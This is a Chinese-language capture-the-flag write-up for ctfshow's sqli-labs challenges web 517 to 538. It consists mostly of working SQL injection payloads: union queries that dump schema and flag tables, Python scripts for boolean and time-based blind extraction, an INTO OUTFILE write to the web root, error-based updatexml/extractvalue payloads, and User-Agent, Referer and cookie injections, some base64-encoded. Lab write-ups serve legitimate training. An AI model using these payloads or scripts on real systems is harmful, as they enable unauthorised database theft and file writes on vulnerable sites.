CTFSHOW (sqli-labs)
web 517
字符型 SQL 注入,查询字段数为 3
?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ #查询所有的数据库 ?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow' --+ #查询ctfshow数据库中所有的表 ?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flag' --+ #查询flag表中的所有列 ?id=-1' union select 1,flag,3 from ctfshow.flag --+ #查询flag列中的数据
web 518
数字型 SQL 注入,查询字段数为 3
?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+ #查询所有的数据库 ?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow'--+ #查询ctfshow数据库中的表 ?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flagaa'--+ #查询flagaa表中的所有列 ?id=-1 union select 1,flagac,3 from ctfshow.flagaa--+ #查询flagac列中的数据
web 519
闭合符号为 '),查询字段数为 3
?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata --+ #查询所有的数据库 ?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow' --+ #查询ctfshow数据库中的所有的表 ?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flagaanec' --+ #查询flagaanec表中的所有列 ?id=-1') union select 1,flagaca,3 from ctfshow.flagaanec --+ #查询flagaca列中的数据
web 520
闭合符号为 ")
?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+ #查询所有的数据库 ?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='ctfshow' --+ 查询ctfshow数据库中的所有的表 ?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='ctfshow' and table_name='flagsf' --+ #查询flagsf表中的所有列 ?id=-1") union select 1,flag23,3 from ctfshow.flagsf --+ #查询flag23列中的数据
web 521
SQL bool 盲注
脚本
import requests flag="" i = 0 while True: i = i+1 low = 32 high =127 while low < high: mid = (low+high)//2 #url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid} --+" #url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid} --+" #url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagpuck'),{i},1))>{mid} --+" url = f"http://bbd62807-74a1-427b-bdb6-13b06ba54c08.challenge.ctf.show/?id=1' and ascii(substr((select flag33 from ctfshow.flagpuck),{i},1))>{mid} --+" r=requests.get(url=url) if "You are in..........." in r.text: low = mid+1 else: high = mid if low !=32: flag+=chr(low) else: break print(flag)
web 522
SQL bool 盲注
闭合符号为 "
import requests flag="" i = 0 while True: i = i+1 low = 32 high =127 while low < high: mid = (low+high)//2 #url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid} --+' #url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid} --+' #url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow" and table_name="flagpa"),{i},1))>{mid} --+' url = f'http://297b22d3-b874-407c-8f91-1490960e5f3d.challenge.ctf.show/?id=1" and ascii(substr((select flag3a3 from ctfshow.flagpa),{i},1))>{mid} --+' r=requests.get(url=url) if "You are in..........." in r.text: low = mid+1 else: high = mid if low !=32: flag+=chr(low) else: break print(flag)
web 523
这道 SQL 注入题需要把查询结果写入文件。注意:写进去的文件似乎无法被覆盖,所以每一步要换一个文件名,依次使用 1.txt、2.txt、3.txt 等。
?id=1')) union select 1,2,group_concat(schema_name) from information_schema.schemata into outfile "/var/www/html/1.txt" --+ 将所有的数据库写入1.txt文件内 ?id=1')) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='ctfshow' into outfile "/var/www/html/2.txt" --+ 将ctfshow数据库中的所有表写入2.txt文件内 ?id=1')) union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagdk' into outfile "/var/www/html/3.txt" --+ #将flagdk表中的所有列写入3.txt ?id=1')) union select 1,2,flag43 from ctfshow.flagdk into outfile "/var/www/html/4.txt" --+ #将flag写入4.txt
web 524
仍然是 bool 盲注,直接使用上面的盲注脚本即可。
web 525
时间盲注,脚本如下:
import requests flag="" i=0 while True: i += 1 low = 32 high =127 while low < high: mid = (low+high)//2 #url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid}),sleep(0.4),0) --+" #url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),{i},1))>{mid}),sleep(0.4),0) --+" #url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flagug'),{i},1))>{mid}),sleep(0.4),0) --+" url=f"http://7c83f3a0-8c78-438c-b049-e1ce771b4db8.challenge.ctf.show/?id=1%27%20and%20if((ascii(substr((select flag4a23 from ctfshow.flagug),{i},1))>{mid}),sleep(0.4),0) --+" r=requests.get(url=url) try: r=requests.get(url=url,timeout=0.3) high =mid except: low =mid +1 if low!= 32: flag+=chr(low) else: break print(flag)web 526
用 " 进行闭合,把上面的脚本稍作修改即可。
web 527
POST 联合注入
uname=1' union select group_concat(schema_name),2 from information_schema.schemata --+&passwd=123&submit=Submit #获得所有的数据库 uname=1' union select group_concat(table_name),2 from information_schema.tables where table_schema='ctfshow' --+&passwd=123&submit=Submit #获取数据库中的所有的表 uname=1' union select group_concat(column_name),2 from information_schema.columns where table_schema='ctfshow' and table_name='flagugsd'--+&passwd=123&submit=Submit #获取flagugsd表中的所有列 uname=1' union select flag43s,2 from ctfshow.flagugsd --+&passwd=123&submit=Submit #获取flag的值
web 528
POST 联合注入,闭合符号为 ")
web 529
POST bool 盲注,闭合符号为 ')。通过页面返回图片的两种不同文件名来判断条件真假:成功时返回 flag.jpg,失败时返回 slap.jpg。
import requests if __name__ == '__main__': url = 'http://9489bc4d-ac59-47ef-ae2f-274db50f220a.challenge.ctf.show/' result = '' i = 0 while True: i = i + 1 low = 32 high = 127 while low < high: mid = (low + high) // 2 # payload = f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)' # payload = f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)' # payload = f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="flag"),{i},1))>{mid},1,0)' payload = f'if(ascii(substr((select group_concat(flag4) from ctfshow.flag),{i},1))>{mid},1,0)' # print(payload) data = { 'uname': f"admin') and {payload}#", 'passwd': '123' } # print(data['uname']) r = requests.post(url=url, data=data) if 'flag.jpg' in r.text: low = mid + 1 else: high = mid if low != 32: result += chr(low) else: break print(result)
web 530
和之前一样是 POST bool 盲注,闭合符号是 "
脚本如下:
import requests flag ="" i = 0 while True: i = i + 1 low = 32 high = 127 while low < high: mid = (low + high) // 2 url = "http://fbd99d37-9d1e-4e77-8b7b-5fed381bac56.challenge.ctf.show/" #payload=f'if(ascii(substr((select group_concat(schema_name) from information_schema.schemata),{i},1))>{mid},1,0)' #payload=f'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="ctfshow"),{i},1))>{mid},1,0)' #payload=f'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema="ctfshow" and table_name="flagb"),{i},1))>{mid},1,0)' payload=f'if(ascii(substr((select flag4s from ctfshow.flagb),{i},1))>{mid},1,0)' data = { 'uname': f'admin" and {payload}#', 'passwd': '123' } #print(data['uname']) r = requests.post(url=url, data=data) if 'flag.jpg' in r.text: low = mid + 1 else: high = mid if low != 32: flag += chr(low) else: break print(flag)
web 531
用 ' 闭合,但报错信息被关闭了,所以需要不断地尝试不同的闭合符。脚本仍然是上面的,稍作修改即可。
web 532
这题需要时间盲注。
web 533
报错注入
uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)-- 爆出数据库 uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)--+ 爆出表 uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'),0x7e),1)--+ 爆出字段 uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag),0x7e),1)--+ uname=admin&passwd=123' and updatexml(1,concat(0x7e,(select right(flag4,24) from ctfshow.flag),0x7e),1)--+ 获得flag
web 534
账号和密码都使用 DUMB 登录后,页面会回显 User-Agent,所以猜测是 UA 注入。
payload:
'and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1) and' ' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1) and ' ' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'),0x7e),1) and ' ' and updatexml(1,concat(0x7e,(select group_concat(flag4) from ctfshow.flag),0x7e),1) and ' ' and updatexml(1,concat(0x7e,(select right(group_concat(flag4),20) from ctfshow.flag),0x7e),1) and '
这里没有使用 --+ 或 # 这类注释符,而是在 payload 末尾加一个单引号来完成闭合。
web 535
Referer 报错注入,payload 和上面的相同,这里不再重复。
web 536
Cookie 报错注入。
Dumb' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='ctfshow'),0x7e),1)--+ Dumb' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='ctfshow' and table_name='flag'),0x7e),1)--+ Dumb' and updatexml(1,concat(0x7e,(select flag4 from ctfshow.flag),0x7e),1)--+ Dumb' and updatexml(1,concat(0x7e,(select right(flag4,20) from ctfshow.flag),0x7e),1)--+
web 537
闭合方式为 ')
Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdjdGZzaG93JyksMHg3ZSkpLS0gLXdxZQ== Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J2N0ZnNob3cnIGFuZCB0YWJsZV9uYW1lPSdmbGFnJyksMHg3ZSkpLS0gLXdxZQ== Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdChmbGFnNCkgZnJvbSBjdGZzaG93LmZsYWcpLDB4N2UpKS0tIC13cWU= Cookie: uname=RHVtYicpIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IHJpZ2h0KGdyb3VwX2NvbmNhdChmbGFnNCksMjApIGZyb20gY3Rmc2hvdy5mbGFnKSwweDdlKSktLSAtd3F
web 538
用 " 闭合
Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J2N0ZnNob3cnKSwweDdlKSktLSAtd3Fl Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0nY3Rmc2hvdycgYW5kIHRhYmxlX25hbWU9J2ZsYWcnKSwweDdlKSktLSAtd3Fl Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGZsYWc0KSBmcm9tIGN0ZnNob3cuZmxhZyksMHg3ZSkpLS0gLXdxZQ== Cookie: uname=RHVtYiIgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgcmlnaHQoZ3JvdXBfY29uY2F0KGZsYWc0KSwyMCkgZnJvbSBjdGZzaG93LmZsYWcpLDB4N2UpKS0tIC13cWU=